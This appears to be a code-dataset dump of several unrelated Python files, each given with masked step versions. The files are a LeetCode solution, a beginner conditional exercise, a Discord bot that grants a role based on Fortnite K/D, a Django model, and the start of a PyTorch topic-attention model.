6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
# https://leetcode.com/problems/how-many-numbers-are-smaller-than-the-current-number/
# BruteForce
class BruteForceSolution:
def smallerNumbersThanCurrent(self, nums):
answer = []
for num in nums:
counter = 0
for i in range(len(nums)):
if nums[i] < num:
counter += 1
answer.append(counter)
return answer
class Solution:
def smallerNumbersThanCurrent(self, nums):
answer = []
sortedNums = sorted(nums)
for num in nums:
answer.append(sortedNums.index(num))
return answer
example = BruteForceSolution()
exampleTwo = Solution()
print(example.smallerNumbersThanCurrent([8,1,2,2,3]))
print(exampleTwo.smallerNumbersThanCurrent([8,1,2,2,3]))
|
normal
|
{
"blob_id": "58e023c3c453d1e190fdb5bc457358f42d1bd93f",
"index": 397,
"step-1": "class BruteForceSolution:\n <mask token>\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\n<mask token>\n",
"step-2": "class BruteForceSolution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n return answer\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\n<mask token>\n",
"step-3": "class BruteForceSolution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n return answer\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\n<mask token>\nprint(example.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\nprint(exampleTwo.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\n",
"step-4": "class BruteForceSolution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n return answer\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\nexample = BruteForceSolution()\nexampleTwo = Solution()\nprint(example.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\nprint(exampleTwo.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\n",
"step-5": "# https://leetcode.com/problems/how-many-numbers-are-smaller-than-the-current-number/\n\n# BruteForce\n\nclass BruteForceSolution:\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n \n \n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n \n return answer\n\nclass Solution:\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n \n sortedNums = sorted(nums)\n \n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n \n \n \n \n \n \nexample = BruteForceSolution()\nexampleTwo = Solution()\n\n\nprint(example.smallerNumbersThanCurrent([8,1,2,2,3]))\n\nprint(exampleTwo.smallerNumbersThanCurrent([8,1,2,2,3]))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
def drive(carspeed):
if carspeed>200:
print("very fast")
elif carspeed>100:
print("toofast")
elif carspeed>70 and carspeed<80:
print("optimal speed")
else:
print("below speed limit")
print(drive(234))
print(drive(34))
drive(134)
#how none will be removed?
def compare(a):
if a>11:
print("big")
elif a==10:
print("reallybig")
compare(10)
|
normal
|
{
"blob_id": "de3eaa5823fb396050527c148273c30bed6ce8ca",
"index": 2644,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef compare(a):\n if a > 11:\n print('big')\n elif a == 10:\n print('reallybig')\n\n\n<mask token>\n",
"step-3": "def drive(carspeed):\n if carspeed > 200:\n print('very fast')\n elif carspeed > 100:\n print('toofast')\n elif carspeed > 70 and carspeed < 80:\n print('optimal speed')\n else:\n print('below speed limit')\n\n\n<mask token>\n\n\ndef compare(a):\n if a > 11:\n print('big')\n elif a == 10:\n print('reallybig')\n\n\n<mask token>\n",
"step-4": "def drive(carspeed):\n if carspeed > 200:\n print('very fast')\n elif carspeed > 100:\n print('toofast')\n elif carspeed > 70 and carspeed < 80:\n print('optimal speed')\n else:\n print('below speed limit')\n\n\nprint(drive(234))\nprint(drive(34))\ndrive(134)\n\n\ndef compare(a):\n if a > 11:\n print('big')\n elif a == 10:\n print('reallybig')\n\n\ncompare(10)\n",
"step-5": "\ndef drive(carspeed):\n\tif carspeed>200:\n\t\tprint(\"very fast\")\n\telif carspeed>100:\n\t\tprint(\"toofast\")\n\telif carspeed>70 and carspeed<80:\n\t\tprint(\"optimal speed\")\n\telse:\n\t\tprint(\"below speed limit\")\nprint(drive(234))\nprint(drive(34))\ndrive(134)\n#how none will be removed?\ndef compare(a):\n\tif a>11:\n\t\tprint(\"big\")\n\telif a==10:\n\t\tprint(\"reallybig\")\ncompare(10)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import discord
import requests
import math
from keys import GITHUB_DISCORD_TOKEN, GITHUB_FORTNITE_API_KEY
client = discord.Client()
# Constant
DISCORD_TOKEN = GITHUB_DISCORD_TOKEN
FORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY
LIST = ['Verified']
VERIFIED = 4
# Return the current season squad K/D of the fortnite player
def get_ratio(username):
try:
print(username)
link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username
response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY})
if response.status_code == 200:
collection = response.json()
if 'error' in collection:
return "-1"
else:
ratio = collection['stats']['curr_p9']['kd']['value']
return ratio
print("Invalid username")
return "-1"
else:
print("Error parsing data.")
return "-2"
except KeyError:
print("Error finding data. KeyError was returned.")
return "-3"
@client.event
async def on_message(message):
# we do not want the bot to reply to itself
if message.author == client.user:
return
# The command !patch return a link with the lastest patch note
if message.content.startswith('!patch'):
await message.channel.send('Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/')
# The command !help explains the one function
if message.content.startswith('!help'):
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify Bot Help", icon_url="")
embed.add_field(name="Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify", value="You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\'t be able to verify you.", inline=False)
await message.channel.send(embed=embed)
# The command !verify return attribute a rank according to the K/D of the user
if message.content.startswith("!verify"):
for list in LIST:
roles = discord.utils.get(message.guild.roles, name=list)
username = '{0.author.display_name}'.format(message)
ratio = float(get_ratio(username))
msgRatio = str(ratio)
msgVerified = str(VERIFIED)
print(ratio)
if ratio == -1.0:
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name="Fortnite player **" + message.author.display_name + "** not found.", value="\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.", inline=False)
await message.channel.send(embed=embed)
elif ratio == -2.0:
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name="Data not found.", value="Fortnite Tracker is down. Please try again shortly.", inline=False)
await message.channel.send(embed=embed)
elif ratio == -3.0:
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name="No stats found for squad mode in the current season.", value="Play some games and try again.", inline=False)
await message.channel.send(embed=embed)
elif ratio > 0 and ratio < VERIFIED:
print("🚫")
print("-")
embed = discord.Embed(colour=discord.Colour(0x45278e), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name=message.author.display_name + " does not have over a " + msgVerified + " K/D.", value="Current season squads K/D: **" + msgRatio + "**", inline=False)
await message.channel.send(embed=embed)
elif ratio >= VERIFIED:
print("✅")
print("-")
role = discord.utils.get(message.guild.roles, name=LIST[0])
embed = discord.Embed(colour=discord.Colour(0x45278e), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name=message.author.display_name + " has over a " + msgVerified + " K/D. Verified!", value="Current season squads K/D: **" + msgRatio + "**", inline=False)
user=message.author
await message.channel.send(embed=embed)
await user.add_roles(role)
@client.event
async def on_ready():
print("-")
print("Logged in as: " + client.user.name)
print("With Client User ID: " + str(client.user.id))
print("Verified set to: " + str(VERIFIED))
print("-")
client.run(DISCORD_TOKEN)
|
normal
|
{
"blob_id": "6c6a49dfced680fe034cbbc2fa28d57d2aa1273e",
"index": 8973,
"step-1": "<mask token>\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('!patch'):\n await message.channel.send(\n 'Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/'\n )\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify Bot Help', icon_url='')\n embed.add_field(name=\n 'Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify'\n , value=\n 'You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.'\n , inline=False)\n await message.channel.send(embed=embed)\n if message.content.startswith('!verify'):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Fortnite player **' + message.author.\n display_name + '** not found.', value=\n \"\"\"\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\"\"\"\n , inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Data not found.', value=\n 'Fortnite Tracker is down. Please try again shortly.',\n inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=\n 'No stats found for squad mode in the current season.',\n value='Play some games and try again.', inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print('🚫')\n print('-')\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' does not have over a ' + msgVerified + ' K/D.', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print('✅')\n print('-')\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' has over a ' + msgVerified + ' K/D. Verified!', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n user = message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role)\n\n\[email protected]\nasync def on_ready():\n print('-')\n print('Logged in as: ' + client.user.name)\n print('With Client User ID: ' + str(client.user.id))\n print('Verified set to: ' + str(VERIFIED))\n print('-')\n\n\nclient.run(DISCORD_TOKEN)\n",
"step-3": "<mask token>\nclient = discord.Client()\nDISCORD_TOKEN = GITHUB_DISCORD_TOKEN\nFORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY\nLIST = ['Verified']\nVERIFIED = 4\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('!patch'):\n await message.channel.send(\n 'Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/'\n )\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify Bot Help', icon_url='')\n embed.add_field(name=\n 'Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify'\n , value=\n 'You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.'\n , inline=False)\n await message.channel.send(embed=embed)\n if message.content.startswith('!verify'):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Fortnite player **' + message.author.\n display_name + '** not found.', value=\n \"\"\"\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\"\"\"\n , inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Data not found.', value=\n 'Fortnite Tracker is down. Please try again shortly.',\n inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=\n 'No stats found for squad mode in the current season.',\n value='Play some games and try again.', inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print('🚫')\n print('-')\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' does not have over a ' + msgVerified + ' K/D.', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print('✅')\n print('-')\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' has over a ' + msgVerified + ' K/D. Verified!', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n user = message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role)\n\n\[email protected]\nasync def on_ready():\n print('-')\n print('Logged in as: ' + client.user.name)\n print('With Client User ID: ' + str(client.user.id))\n print('Verified set to: ' + str(VERIFIED))\n print('-')\n\n\nclient.run(DISCORD_TOKEN)\n",
"step-4": "import discord\nimport requests\nimport math\nfrom keys import GITHUB_DISCORD_TOKEN, GITHUB_FORTNITE_API_KEY\nclient = discord.Client()\nDISCORD_TOKEN = GITHUB_DISCORD_TOKEN\nFORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY\nLIST = ['Verified']\nVERIFIED = 4\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('!patch'):\n await message.channel.send(\n 'Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/'\n )\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify Bot Help', icon_url='')\n embed.add_field(name=\n 'Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify'\n , value=\n 'You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.'\n , inline=False)\n await message.channel.send(embed=embed)\n if message.content.startswith('!verify'):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Fortnite player **' + message.author.\n display_name + '** not found.', value=\n \"\"\"\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\"\"\"\n , inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Data not found.', value=\n 'Fortnite Tracker is down. Please try again shortly.',\n inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=\n 'No stats found for squad mode in the current season.',\n value='Play some games and try again.', inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print('🚫')\n print('-')\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' does not have over a ' + msgVerified + ' K/D.', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print('✅')\n print('-')\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' has over a ' + msgVerified + ' K/D. Verified!', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n user = message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role)\n\n\[email protected]\nasync def on_ready():\n print('-')\n print('Logged in as: ' + client.user.name)\n print('With Client User ID: ' + str(client.user.id))\n print('Verified set to: ' + str(VERIFIED))\n print('-')\n\n\nclient.run(DISCORD_TOKEN)\n",
"step-5": "import discord\nimport requests\nimport math\nfrom keys import GITHUB_DISCORD_TOKEN, GITHUB_FORTNITE_API_KEY\n\nclient = discord.Client()\n\n# Constant\nDISCORD_TOKEN = GITHUB_DISCORD_TOKEN\nFORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY\n\nLIST = ['Verified']\nVERIFIED = 4\n\n# Return the current season squad K/D of the fortnite player\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY})\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return \"-1\"\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print(\"Invalid username\")\n return \"-1\"\n else:\n print(\"Error parsing data.\")\n return \"-2\"\n except KeyError:\n print(\"Error finding data. KeyError was returned.\")\n return \"-3\"\n\[email protected]\nasync def on_message(message):\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n # The command !patch return a link with the lastest patch note\n if message.content.startswith('!patch'):\n await message.channel.send('Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/')\n # The command !help explains the one function\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify Bot Help\", icon_url=\"\")\n embed.add_field(name=\"Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify\", value=\"You can change your nickname by typing \\\"/nick *YourEpicIGN*\\\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.\", inline=False)\n await message.channel.send(embed=embed)\n # The command !verify return attribute a rank according to the K/D of the user\n if message.content.startswith(\"!verify\"):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=\"Fortnite player **\" + message.author.display_name + \"** not found.\", value=\"\\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=\"Data not found.\", value=\"Fortnite Tracker is down. Please try again shortly.\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=\"No stats found for squad mode in the current season.\", value=\"Play some games and try again.\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print(\"🚫\")\n print(\"-\")\n embed = discord.Embed(colour=discord.Colour(0x45278e), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name + \" does not have over a \" + msgVerified + \" K/D.\", value=\"Current season squads K/D: **\" + msgRatio + \"**\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print(\"✅\")\n print(\"-\")\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(0x45278e), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name + \" has over a \" + msgVerified + \" K/D. Verified!\", value=\"Current season squads K/D: **\" + msgRatio + \"**\", inline=False)\n user=message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role) \n \[email protected]\nasync def on_ready():\n print(\"-\")\n print(\"Logged in as: \" + client.user.name)\n print(\"With Client User ID: \" + str(client.user.id))\n print(\"Verified set to: \" + str(VERIFIED))\n print(\"-\")\n\nclient.run(DISCORD_TOKEN)\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.db import models
class FoodCategory(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=200, default='')
class Meta:
db_table = 'kitchenrock_category'
def __str__(self):
return self.name
|
normal
|
{
"blob_id": "9bb1fc4df80d183c70d70653faa3428964b93a94",
"index": 9494,
"step-1": "<mask token>\n\n\nclass FoodCategory(models.Model):\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass FoodCategory(models.Model):\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n\n def __str__(self):\n return self.name\n",
"step-3": "<mask token>\n\n\nclass FoodCategory(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=200, default='')\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n\n def __str__(self):\n return self.name\n",
"step-4": "from django.db import models\n\n\nclass FoodCategory(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=200, default='')\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n\n def __str__(self):\n return self.name\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
import torch
from torch import nn
import torch.nn.functional as F
class JointModel(nn.Module):
def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,
num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,
context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,
num_label, pretrained_embedding):
super(JointModel, self).__init__()
##NGTM:
self.d_v = d_v # vocabulary size
self.d_e = d_e # dimensionality of encoder
self.d_t = d_t # number of topics
self.encoder_layers = encoder_layers
self.generator_layers = generator_layers
self.generator_transform = generator_transform # transform to apply after the generator
self.encoder_shortcut = encoder_shortcut
self.generator_shortcut = generator_shortcut
self.en1_fc = nn.Linear(self.d_v, self.d_e)
self.en2_fc = nn.Linear(self.d_e, self.d_e)
self.en_drop = nn.Dropout(0.2)
self.mean_fc = nn.Linear(self.d_e, self.d_t)
# self.mean_bn = nn.BatchNorm1d(self.d_t)
self.logvar_fc = nn.Linear(self.d_e, self.d_t)
# self.logvar_bn = nn.BatchNorm1d(self.d_t)
self.generator1 = nn.Linear(self.d_t, self.d_t)
self.generator2 = nn.Linear(self.d_t, self.d_t)
self.generator3 = nn.Linear(self.d_t, self.d_t)
self.generator4 = nn.Linear(self.d_t, self.d_t)
self.r_drop = nn.Dropout(0.2)
self.de = nn.Linear(self.d_t, self.d_v)
# self.de_bn = nn.BatchNorm1d(self.d_v)
##HAN:
self.emb_size = emb_size
self.word_rnn_size = word_rnn_size
self.word_rnn_num_layer = word_rnn_num_layer
self.word_rnn_bidirectional = word_rnn_bidirectional
self.context_rnn_size = context_rnn_size
self.context_rnn_num_layer = context_rnn_num_layer
self.context_rnn_bidirectional = context_rnn_bidirectional
self.num_label = num_label
self.embedding = nn.Embedding(num_word, emb_size)
self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,
num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)
word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size
self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)
self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)
